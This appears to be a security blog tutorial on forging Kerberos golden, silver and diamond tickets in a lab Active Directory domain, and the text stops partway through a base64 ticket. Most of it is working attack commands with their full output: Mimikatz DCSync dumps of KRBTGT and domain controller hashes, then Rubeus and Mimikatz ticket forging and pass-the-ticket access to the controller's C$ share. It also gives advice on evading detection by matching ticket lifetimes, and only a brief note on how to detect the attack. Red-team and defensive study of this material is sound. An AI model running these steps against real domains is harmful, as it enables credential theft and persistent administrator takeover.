Infrastructure

Forged Kerberos Tickets

2024
bordergate

If an adversary can gain access to NTLM or AES account keys, they can use these values to generate forged Kerberos tickets. Forging Kerberos tickets can be a great way to maintain access to an Active Directory environment.

This article will look at three common methods of doing this:

Golden Tickets

An adversary with access to a KRBTGT account hash can generate their own Kerberos tickets for any user in a domain, including administrators. This is known as a Golden Ticket Attack.

In older domains, the forged user did not necessarily need to exist in the domain. However, since KB5008380 the user account targeted does need to exist in the domain.

Rubeus can be used to generate forged Kerberos tickets.

Getting Access to the KRBTGT

First we need access to gain access to the KRBTGT account credentials. This account is responsible for the Kerberos Key Distribution Center Service which handles ticket requests and issues Ticket Granting Tickets (TGTs) for users.

We can use Mimikatz to perform a DCSync attack to gain access to the KRBTGT account hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\krbtgt" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\krbtgt
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
 
Object RDN           : krbtgt
 
** SAM ACCOUNT **
 
SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 28/04/2024 02:35:48
Object Security ID   : S-1-5-21-1220112391-3624315575-3511410581-502
Object Relative ID   : 502
 
Credentials:
  Hash NTLM: 9a1b5b20c1959f4bcaf9f4838eba7472
    ntlm- 0: 9a1b5b20c1959f4bcaf9f4838eba7472
    lm  - 0: 6fba1ef75d362808b3594035721f1955
 
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7b31ffa11e101561bcf68f2e3df76299
 
* Primary:Kerberos-Newer-Keys *
    Default Salt : BORDERGATE.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28
      aes128_hmac       (4096) : 9d15c219d740aa2989b4f71b66af6df9
      des_cbc_md5       (4096) : 1cec2c988513b9b9
 
* Primary:Kerberos *
    Default Salt : BORDERGATE.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 1cec2c988513b9b9
 
* Packages *
    NTLM-Strong-NTOWF
 
mimikatz(commandline) # exit
Bye!

Creating a Golden Ticket

Next, we need to use PowerView to get the FQDN of the domain, and it’s associated SID:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PS C:\Tools> . .\PowerView.ps1
 
PS C:\Tools> Get-Domain
Forest                  : bordergate.local
DomainControllers       : {DC01.bordergate.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC01.bordergate.local
RidRoleOwner            : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name                    : bordergate.local
 
PS C:\Tools> Get-DomainSID
S-1-5-21-1220112391-3624315575-3511410581

We can then use Rubeus with the /ptt flag to inject a the ticket for the Administrator user into our session, allowing us to access the domain controller’s C$ share.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
C:\Users\alice>dir \\DC01.bordergate.local\C$
Access is denied.
 
 
Rubeus.exe golden /aes256:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /user:Administrator /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.3.0
 
[*] Action: Build TGT
 
[*] Building PAC
 
[*] Domain         : BORDERGATE.LOCAL (BORDERGATE)
[*] SID            : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : bordergate.local
 
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@bordergate.local'
 
[*] AuthTime       : 29/04/2024 18:05:12
[*] StartTime      : 29/04/2024 18:05:12
[*] EndTime        : 30/04/2024 01:05:12
[*] RenewTill      : 06/05/2024 18:05:12
 
[*] base64(ticket.kirbi):
 
      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
      HDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWw=
 
 
[+] Ticket successfully imported!
 
C:\Tools>dir \\DC01\C$
 Volume in drive \\DC01\C$ has no label.
 Volume Serial Number is 343D-F2D0
 
 Directory of \\DC01\C$
 
08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,939,592,704 bytes free

The same attack can be performed using Mimikatz:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mimikatz.exe
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz # kerberos::golden /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User      : Administrator
Domain    : bordergate.local (BORDERGATE)
SID       : S-1-5-21-1220112391-3624315575-3511410581
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime  : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session

It’s possible to detect Golden ticket attacks by;

  • Looking for service requests (TGS) have no corresponding TGT requests. This situation can be resolved using diamond tickets.
  • By monitoring for tickets with unusually long lifespans.

To ensure that our ticket lifespan meets what’s typical in our target environment, we can first determine the current default policy with PowerView;

1
2
3
4
5
6
7
8
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-DomainPolicy | select -expand KerberosPolicy
 
MaxTicketAge         : 10
MaxRenewAge          : 7
MaxServiceAge        : 600
MaxClockSkew         : 5
TicketValidateClient : 1

Based on this information, we can set the following flags in Mimikatz to generate tickets that look normal for the target environment;

/startoffset:0 /endin:600 /renewmax:7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\Tools> .\mimikatz.exe
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz # kerberos::golden /startoffset:0 /endin:600 /renewmax:7 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User      : Administrator
Domain    : bordergate.local (BORDERGATE)
SID       : S-1-5-21-1220112391-3624315575-3511410581
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime  : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session

Silver Tickets

Silver ticket attacks allow an adversary to forge TGS (Ticket Granting Service) tickets for a specific service. The benefits of this attack over golden tickets is no interaction with a domain controller is required, therefore potentially being more stealthy.

Getting Access to a Service Account

First we need to extract the service account password for the domain controller (dc01$).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\dc01$" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\dc01$
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\dc01$' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
 
Object RDN           : DC01
 
** SAM ACCOUNT **
 
SAM Username         : DC01$
Account Type         : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration   :
Password last change : 28/04/2024 18:36:16
Object Security ID   : S-1-5-21-1220112391-3624315575-3511410581-1000
Object Relative ID   : 1000
 
Credentials:
  Hash NTLM: e04ae9e43f82df634c9e61d09577acb4
 
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423
      aes128_hmac       (4096) : ed536a8d7a0daf906314d7387e8d2845
      des_cbc_md5       (4096) : eaf1fb629e13c81f
    OldCredentials
      aes256_hmac       (4096) : e7637bed1b981202d5497de82f4931d30b06d70068b40037b9e0acc60a124ed9
      aes128_hmac       (4096) : 76935fc442752233880f5aa0b23730e3
      des_cbc_md5       (4096) : 790e8a4cd9dc0413
 
* Primary:Kerberos *
    Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
    Credentials
      des_cbc_md5       : eaf1fb629e13c81f
    OldCredentials
      des_cbc_md5       : 790e8a4cd9dc0413
 
* Packages *
    NTLM-Strong-NTOWF
 
mimikatz(commandline) # exit
Bye!

Creating a Silver Ticket

With access to the service account hash, we can then use Rubeus to generate a silver ticket to access the CIFS service:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
C:\Tools>rubeus.exe silver /service:cifs/dc01.bordergate.local /aes256:80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt /user:dc01$
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.3.0
 
[*] Action: Build TGS
 
[*] Building PAC
 
[*] Domain         : BORDERGATE.LOCAL (BORDERGATE)
[*] SID            : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : cifs
[*] Target         : dc01.bordergate.local
 
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'dc01$' to 'cifs/dc01.bordergate.local'
 
[*] AuthTime       : 29/04/2024 18:04:22
[*] StartTime      : 29/04/2024 18:04:22
[*] EndTime        : 30/04/2024 03:04:22
[*] RenewTill      : 06/05/2024 18:04:22
 
[*] base64(ticket.kirbi):
 
      doIFdzCCBXOgAwIBBaEDAgEWooIEWzCCBFdhggRTMIIET6ADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
      KDAmoAMCAQKhHzAdGwRjaWZzGxVkYzAxLmJvcmRlcmdhdGUubG9jYWyjggQIMIIEBKADAgESoQMCAQOi
      ggP2BIID8mIanR3pno2NO0KdJSuHBveCO3YFMIfGov/FXWBYQOeRTy+x9MEl2ylJ25JvGCC/Q6g5n9ol
      84hL8Tm2CyafV55HjJsD+zkvCf0YDAC2tf6YtoCNiGyYv/iH/5ki1Ux6dyok73YHGqvR9jwUnplB2Q11
      nw8itpXz0cpGeB1GWBJztOIZQd81qCga2OLaYZT7EV/yxrWBMRKZ8R7I2jxlC1vJWRfcXim8naEnceHb
      vPbRvL4o2jF+5Wx5kTcSEZXNypwXiz4YLL2W4NE/gJGQnvp6dLG35XpQFM+tr1s8yrysa9By8RO/R3bR
      LG9V36z2f3jckRQmXYEcIzjbGl041ZZoXn8aDSimiqT+gKkVWrCmZcT5E5a0AjmEn/Mq4BuUpHry1M7p
      jPXmKJRqamQeVgcIiig7v+fvEdudZn0eR43EmUSs4AJC0YsuyxS7N25o/yPBZhxorlmVUvPSYtpHkgRX
      NjfePh600wamFHVOlpq7YMYI/v2PUMxzj57i5i5YlSsDMHeNEuaou4A9MmdMvi2hhHiWq7VTnXbJZcJL
      z2XJQ99B+twWrQlWZ+KXiLEpP9f9jezgt9x8LqudSbWNXMQB4XEkTDT8haSgR4aqSsyQnVYzhKcyfoP9
      floiKKrU+sOLlw3Ds3fdphL3KoCXf/OrZshhLBOrYNZZ7q/hQrxdDx6enHYMvLjuMw5cnjJst5knAmwe
      sybb9aaKAvvfao7fWtqfvUcPXBCEirTBrgdMSStd0wMY3J5r0NUThq1vcLRqE89fnbl/B2+V9zkegfN4
      FBxQIKoq2foW1Ome+nJfrn9i2m7nLpM0/GSN684xxF4PTqvYi8qnsmL6SqXWQ/GlAuJVS0GkVUkxUO2T
      YiTz8bTmm3s9a13IPS5VCVRHtSIFfpsv+ApV3kZ+xUgAATxoKao6lqWvy7h3BARiLQd1n875DVHGBahE
      Gyhf2oMBGZGsFT/6eWvR19uivOInOCP2ZpFiiyyKScWuAtk3Pm8P2vqzl8JwUo31k+97IOiVMyFlx2jm
      bHtvB/YrTZhQCWW+Db3mSFhO0cBwYy14lIMtEq4Dzs6HWn8zdAJ3aQDlC+Vv6+CJvyuu/RzFlKE/kwFG
      dDRHE8rFQxjhnIvDmBwBZTFJ0cfCWMf7J8SxtXUbcIWifn2lp73uaMsZw29QSfL7qwqseO/zH+ZK5wee
      XQwvLouPMS9P5FPUVMmNo1LVKfkzvLvZf+Ae/DwhPufFh8qXtplcArtUV8oyOfGdhL5jpNGN02bLNQfv
      rXWgxEIMbrX/nv7RI+t0upX3ICh+5egDPSqoktOEiQuHHQ7bSseTKsWVxhKHkURH/SGRCEDp7RBQo4IB
      BjCCAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KArMCmgAwIBEqEiBCDMn2jXRb/3UrD5ppIp+tg6
      0mBQthnPWbam/idQh1OtiKESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEBoQkwBxsFZGMwMSSjBwMF
      AECgAACkERgPMjAyNDA0MjkxNjA0MjJapREYDzIwMjQwNDI5MTYwNDIyWqYRGA8yMDI0MDQzMDAyMDQy
      MlqnERgPMjAyNDA1MDYxNjA0MjJaqBIbEEJPUkRFUkdBVEUuTE9DQUypKDAmoAMCAQKhHzAdGwRjaWZz
      GxVkYzAxLmJvcmRlcmdhdGUubG9jYWw=
 
 
[+] Ticket successfully imported!
 
C:\Tools>dir \\dc01.bordergate.local\c$
 Volume in drive \\dc01.bordergate.local\c$ has no label.
 Volume Serial Number is 343D-F2D0
 
 Directory of \\dc01.bordergate.local\c$
 
08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,926,878,720 bytes free

Diamond Tickets

Forged Golden and Silver tickets can be detected since the service requests (TGS) have no corresponding TGT requests.

In a Diamond ticket attack, an adversary requests valid TGT from a domain controller. This is then decrypted using the KRBTGT account hash, modified to meet the adversaries requirements then re-encrypted. Since an initial TGT request takes place, this reduces the chance of detection in comparison to a Golden Ticket attack.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
C:\Tools>dir \\dc01.bordergate.local\C$
Access is denied.
 
C:\Tools>dir \\dc01\C$
Access is denied.
 
C:\Tools>Rubeus.exe diamond /krbkey:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bordergate.local /ticketuserid:500 /ptt
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.3.0
 
[*] Action: Diamond Ticket
 
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.bordergate.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: t/DPs5uWq4XvahoWh0mK0Uv4hiwa/n5TyR4R7p06d6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
 
      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
      Qk9SREVSR0FURS5MT0NBTA==
 
[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT
 
[*] base64(ticket.kirbi):
 
      doIGFDCCBhCgAwIBBaEDAgEWooIFCDCCBQRhggUAMIIE/KADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
      JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEEJPUkRFUkdBVEUuTE9DQUyjggS4MIIEtKADAgESoQMCAQOiggSm
      BIIEoh0/vYuRv0VL0djIBPwrq6FswBS2mObJSg7fY+ZyrDLDq7tbwcWk5ijEjfi7pqqsGbWVBtpam190
      xXas2KvlcS8q63aDrUKsSlFbZVFMkI5AObNBxUa2G3xtWJR+pKBONsEngD8negVsVDjT1MavuZC7K88J
      iRz9cbdD+I6ngUOZzLioTG4ClBZa/EfCLWgUClSL6ICniPcbd9WRGk/ZND5coT2y/9VqNJAtKSzX5pcJ
      Aep1K/uhWihgtLQrXeJIS34GQ/xLiyqSs81zXvdD3ljeP65neIDmSNc8gWQfMqgFxMKUetlwoIyLGjSr
      frMm70nhC+afm2rWol3+vwcodkjJmukks/8+lueFkrKmD45RpBafDiKERfHOFAVRy5lviUJhGRToKD1d
      SJf5aShEo0fIjXOLyWfErVf1DesiaLNkHuucTP+6ZfX+zFIwOsCbyR7zsuNj3SOL1Ghy+SUKMte5XPOM
